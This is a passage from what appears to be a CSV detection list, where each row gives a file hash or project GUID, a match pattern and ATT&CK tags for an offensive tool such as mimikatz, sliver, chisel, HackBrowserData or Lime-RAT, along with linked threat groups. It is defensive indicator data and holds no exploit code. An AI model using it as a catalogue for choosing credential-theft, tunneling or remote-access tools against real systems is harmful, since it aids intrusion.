TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","23979" "*2e09c605521fc3d2a8cdda835b54a6054a577071f5ea3f26add10cbfe0dcb369*",".{0,1000}2e09c605521fc3d2a8cdda835b54a6054a577071f5ea3f26add10cbfe0dcb369.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23980" "*2e10414ca66fb0469f425572ceb27299306a76d1ed0a1f39050314c1ece46f66*",".{0,1000}2e10414ca66fb0469f425572ceb27299306a76d1ed0a1f39050314c1ece46f66.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - 
T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23981" "*2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3*",".{0,1000}2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23982" "*2e10ff03c18dcdeda7ccb185154f17ae29f54920a489edd270c535d7813366e0*",".{0,1000}2e10ff03c18dcdeda7ccb185154f17ae29f54920a489edd270c535d7813366e0.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","23983" "*2e179a37f42864951b1151bba266fff17c45e6cacf0fbc8ebf8d8ad9ab45ada9*",".{0,1000}2e179a37f42864951b1151bba266fff17c45e6cacf0fbc8ebf8d8ad9ab45ada9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23984" "*2e18f54ffc6007a57706d500ea0159baed76eeec31c1a0a2ee2e5ce24b79acc6*",".{0,1000}2e18f54ffc6007a57706d500ea0159baed76eeec31c1a0a2ee2e5ce24b79acc6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. 
Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23985" "*2e21672308bcb51cab1a41253f0132ad82101d5b24c33dd1fdad89b4bd619dd7*",".{0,1000}2e21672308bcb51cab1a41253f0132ad82101d5b24c33dd1fdad89b4bd619dd7.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23987" "*2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97*",".{0,1000}2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23989" "*2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6*",".{0,1000}2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - 
T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","23990" "*2e3bc20ce205875bea72dc1aceafc75307c0ed033d7e11846d97ca30ab3852ee*",".{0,1000}2e3bc20ce205875bea72dc1aceafc75307c0ed033d7e11846d97ca30ab3852ee.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23991" "*2e427f766b9421cc1873cdc07c3552d3ab457c9139db05b2440b23577ab97217*",".{0,1000}2e427f766b9421cc1873cdc07c3552d3ab457c9139db05b2440b23577ab97217.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23993" "*2e47db0e24601fb84751b429e0bc672a644961168901759e6e96a97896bb6f99*",".{0,1000}2e47db0e24601fb84751b429e0bc672a644961168901759e6e96a97896bb6f99.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23995" "*2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525*",".{0,1000}2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23997" "*2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c*",".{0,1000}2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23998" "*2e635883f111c05144ef8473d7a7a35a9ce1b5d50e0f944957cb39a39c860bde*",".{0,1000}2e635883f111c05144ef8473d7a7a35a9ce1b5d50e0f944957cb39a39c860bde.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24000" "*2e67c9adb1962e9b5c9a025b2901fc01e2a214b53f5552656a07f2057307f6e5*",".{0,1000}2e67c9adb1962e9b5c9a025b2901fc01e2a214b53f5552656a07f2057307f6e5.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","24001" "*2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630*",".{0,1000}2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24002" "*2e70433f8b5f60e28dbd95757dd4bf967fa744142deac4b3bcb0d3b11cb99753*",".{0,1000}2e70433f8b5f60e28dbd95757dd4bf967fa744142deac4b3bcb0d3b11cb99753.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24003" "*2e70b4bcc21c4aba64c283af815b20d52c79c93f14f9df623a6e588491155acf*",".{0,1000}2e70b4bcc21c4aba64c283af815b20d52c79c93f14f9df623a6e588491155acf.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool 
collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","24004" "*2e7451bba0392fb9d687c8cf6d7b99a7983742542ac0217d11f899d2d7bad07b*",".{0,1000}2e7451bba0392fb9d687c8cf6d7b99a7983742542ac0217d11f899d2d7bad07b.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","#filehash","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","24005" "*2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e*",".{0,1000}2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24007" "*2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e*",".{0,1000}2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24008" 
"*2e777ea84aa3cca0a17f3a08776d0bb993ad0ca42b2276429f13e7e036d51746*",".{0,1000}2e777ea84aa3cca0a17f3a08776d0bb993ad0ca42b2276429f13e7e036d51746.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#filehash","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","24010" "*2e7780d7593f341c0b72ad38f91638cfbb917e7f9f342b3ffaa842d207d4ab85*",".{0,1000}2e7780d7593f341c0b72ad38f91638cfbb917e7f9f342b3ffaa842d207d4ab85.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24011" "*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*",".{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","24013" "*2e7ba2362283c11797edad1044e20352c880eb21f946e0527a222d342dcbce78*",".{0,1000}2e7ba2362283c11797edad1044e20352c880eb21f946e0527a222d342dcbce78.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24014" "*2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f*",".{0,1000}2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24015" "*2e7c7e2e3546caafc5ca9729bfc5ae561049e75f24ce1439198caba776996d66*",".{0,1000}2e7c7e2e3546caafc5ca9729bfc5ae561049e75f24ce1439198caba776996d66.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24016" "*2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849*",".{0,1000}2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24017" "*2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076*",".{0,1000}2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24018" "*2e84c88282d85d3b93ae2637b90e3f4388fc2f96092b7e7aaa8e66b288549930*",".{0,1000}2e84c88282d85d3b93ae2637b90e3f4388fc2f96092b7e7aaa8e66b288549930.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24019" "*2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d*",".{0,1000}2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24021" "*2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d*",".{0,1000}2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - 
Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24022" "*2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298*",".{0,1000}2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24025" "*2e93e83a8c1671dec1b0b4a9873025f47567a1092e12bcfe14d1f78e5696aaeb*",".{0,1000}2e93e83a8c1671dec1b0b4a9873025f47567a1092e12bcfe14d1f78e5696aaeb.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24028" "*2e9447cafdf0506400c263e4656c0a995618be12be9ebbf08cfbc5ea143d328a*",".{0,1000}2e9447cafdf0506400c263e4656c0a995618be12be9ebbf08cfbc5ea143d328a.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24029" "*2e944f0ec797e703db9def360969ee414dd733cac1ee7a3eac98d4131529668c*",".{0,1000}2e944f0ec797e703db9def360969ee414dd733cac1ee7a3eac98d4131529668c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","24030" "*2E98B8D4-7A26-4F04-A95D-2051B0AB884C*",".{0,1000}2E98B8D4\-7A26\-4F04\-A95D\-2051B0AB884C.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#GUIDproject","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","24032" "*2E9B1462-F47C-48CA-9D85-004493892381*",".{0,1000}2E9B1462\-F47C\-48CA\-9D85\-004493892381.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#GUIDproject","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","24033" "*2eb2cc1eb661148109488b8f36aa6b248e88c0f1*",".{0,1000}2eb2cc1eb661148109488b8f36aa6b248e88c0f1.{0,1000}","offensive_tool_keyword","crackmapexec","crack mapexec script used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor - APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","24036" "*2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e*",".{0,1000}2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 